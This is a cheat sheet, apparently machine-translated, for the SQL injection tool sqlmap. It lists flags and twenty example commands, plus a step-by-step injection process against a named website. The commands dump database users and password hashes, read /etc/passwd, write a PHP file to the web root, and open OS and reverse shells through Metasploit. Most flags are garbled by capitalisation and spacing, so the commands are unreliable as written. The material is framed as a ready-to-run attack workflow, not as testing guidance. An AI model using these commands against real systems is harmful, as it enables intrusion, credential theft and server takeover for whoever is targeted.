-U # injection point
-F # Fingerprint Identification Database Type
-B # obtain database version information
-P # specify the testable parameters (? Page = 1 & id = 2-p "page, Id ")
-D "" # specify the Database Name
-T "" # specify the table name
-C "" # specify Fields
-S "" # Save the injection process to a file, which can be interrupted. The next recovery will be performed in the injection (save:-s "XX. log "recovery:-s" XX. log "-resume)
-Columns # list fields
-Current-user # Get the current user name
-Current-DB # Get the current database name
-Users # list all database users
-Passwords # all passwords of database users
-Privileges # view User Permissions (-privileges-u root)
-U # specify database users
-DBS # list all databases
-Tables-d "" # list tables in the specified database
-Columns-T "user"-d "MySQL" # list all fields of the User table in the MySQL database
-Dump-all # list all tables in all databases
-Exclude-sysdbs # Only list the databases and tables created by the user
-Dump-T ""-d ""-c "" # list the data of fields in the table of the specified database (-dump-T users-D master-C surname)
-Dump-T ""-d ""-Start 2-Top 4 # list the data of 2-4 fields in the table of the specified database
-DBMS # specifies the database (MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase, SAP MaxDB)
-OS # specify the system (Linux, Windows)
-V # detailed level (0-6)
0: Only tracing, errors, and key messages of Python are displayed.
1: displays information and warning messages.
2: displays debugging messages.
3: payload injection.
4: displays HTTP requests.
5: The HTTP response header is displayed.
6: display the content of the HTTP response page
-Privileges # view Permissions
-Is-DBA # whether it is a database administrator
-Roles # enumerate Database User Roles
-UDF-inject # import user-defined functions (obtain system permissions)
-Union-check # whether Union injection is supported
-Union-cols # Union queries table records
-Union-test # Union statement Test
-Union-use # use Union Injection
-Union-tech orderby # union and order
-Method "Post"-Data "" # submit data in post mode (-method "Post"-Data "page = 1 & id = 2 ″)
-Cookie "separated by" # cookie injection (-Cookies = "PHPSESSID = mvijocbglq6pi463rlgk1e4v52; security = low ")
-Referer "" # Use Referer spoofing (-Referer "http://www.baidu.com ")
-User-Agent "" # Custom User-Agent
-Proxy "http: // 127.0.0.1: 8118" # proxy Injection
-String "" # specify a keyword
-Threads # multithreading (-threads 3)
-SQL-shell # Run the specified SQL command
-SQL-query # Run the specified SQL statement (-SQL-query "select password from mysql. User where user = 'root' limit 0, 1 ″)
-File-read # Read a specified file
-File-write # Write the local file (-file-Write/test/test.txt-file-Dest/var/www/html/1.txt.pdf writes the corresponding test.txtfile to the target 1.txt file)
-File-Dest # absolute path of the file to be written
-OS-cmd = ID # Run the system command
-OS-shell # system interaction Shell
-OS-pwn # reverse shell (-OS-pwn-MSF-Path =/opt/framework/msf3 /)
-MSF-Path = # matesploit absolute path (-MSF-Path =/opt/framework/msf3 /)
-OS-smbrelay #
-OS-Bof #
-Reg-read # Read the Windows Registry
-Priv-ESC #
-Time-sec = # default latency setting-time-sec = 5 to 5 seconds
-P "User-Agent"-User-Agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" # specify User-Agent Injection
-ETA # Blind Injection
/Pentest/database/sqlmap/TXT/
Common-columns.txt field dictionary
Common-outputs.txt
Common-tables.txt table dictionary
Keywords.txt
Oracle-default-passwords.txt
User-agents.txt
Wordlist.txt
Common statements
1.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-F-B-current-user-current-db-users-passwords-DBS-V 0
2.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-passwords-u root-Union-use-V 2
3.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-dump-T users-C username-D userdb-Start 2-Stop 3-V 2
4.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-dump-C "user, pass"-V 1-exclude-sysdbs
5.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-SQL-shell-V 2
6.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-file-read "C: \ Boot. ini"-V 2
7.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-file-Write/test/test.txt-file-Dest/var/www/html/1.txt-V 2
8.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-cmd "ID"-V 1
9.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-shell-Union-use-V 2
10.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-pwn-MSF-Path =/opt/framework/msf3-priv-ESC-V 1
11.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-pwn-MSF-Path =/opt/framework/msf3-V 1
12.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-Bof-MSF-Path =/opt/framework/msf3-V 1
13.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-reg-add-reg-Key = "hkey_local_nachine \ sofeware \ sqlmap"-reg-value = test-reg-type = REG_SZ-reg-Data = 1
14.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-ETA
15.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MySQL/get_str_brackets.php? Id = 1 "-p id-prefix" ') "-suffix" and ('abc' = 'abc"
16.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MySQL/basic/get_int.php? Id = 1 "-auth-type basic-auth-cred" testuser: testpass"
17.
./Sqlmap. py-l burp. Log-scope = "(WWW )? \. Target \. (COM | net | org )"
18.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MySQL/get_int.php? Id = 1 "-tamper/between. py, tamper/randomcase. py, tamper/space2comment. py-V 3
19.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MSSQL/get_int.php? Id = 1 "-SQL-query" select 'foo' "-V 1
20.
./Sqlmap. py-U "http://www.91ri.org/MySQL/get_int_4.php? Id = 1 "-common-tables-D testdb-Banner
Simple Injection Process
1. Read the database version, current user, current database
Sqlmap-u http://www.91ri.org/test. php? P = 2-F-B-current-user-current-db-V 1
2. Determine the Current Database User Permissions
Sqlmap-u http://www.91ri.org/test. php? P = 2-privileges-u username-V 1
Sqlmap-u http://www.91ri.org/test. php? P = 2-is-DBA-u username-V 1
3. Read the passwords of all database users or specified database users
Sqlmap-u http://www.91ri.org/test. php? P = 2-users-passwords-V 2
Sqlmap-u http://www.91ri.org/test. php? P = 2-passwords-u root-V 2
4. Retrieve all databases
Sqlmap-u http://www.91ri.org/test. php? P = 2-DBS-V 2
5. Retrieve all tables in the specified database
Sqlmap-u http://www.91ri.org/test. php? P = 2-tables-D mysql-V 2
6. Obtain the fields of the specified table in the specified database name
Sqlmap-u http://www.91ri.org/test. php? P = 2-columns-D mysql-T users-V 2
7. Obtain the data of the specified field in the specified table in the specified database name
Sqlmap-u http://www.91ri.org/test. php? P = 2-dump-D mysql-T users-C "username, password"-s "sqlnmapdb. Log"-V 2
8. File-read: reads web files.
Sqlmap-u http://www.91ri.org/test. php? P = 2-file-read "/etc/passwd"-V 2
9. File-write the file to the Web
Sqlmap-u http://www.91ri.org/test. php? P = 2-file-Write/localhost/mm. php-file-Dest/var/www/html/XX. php-V 2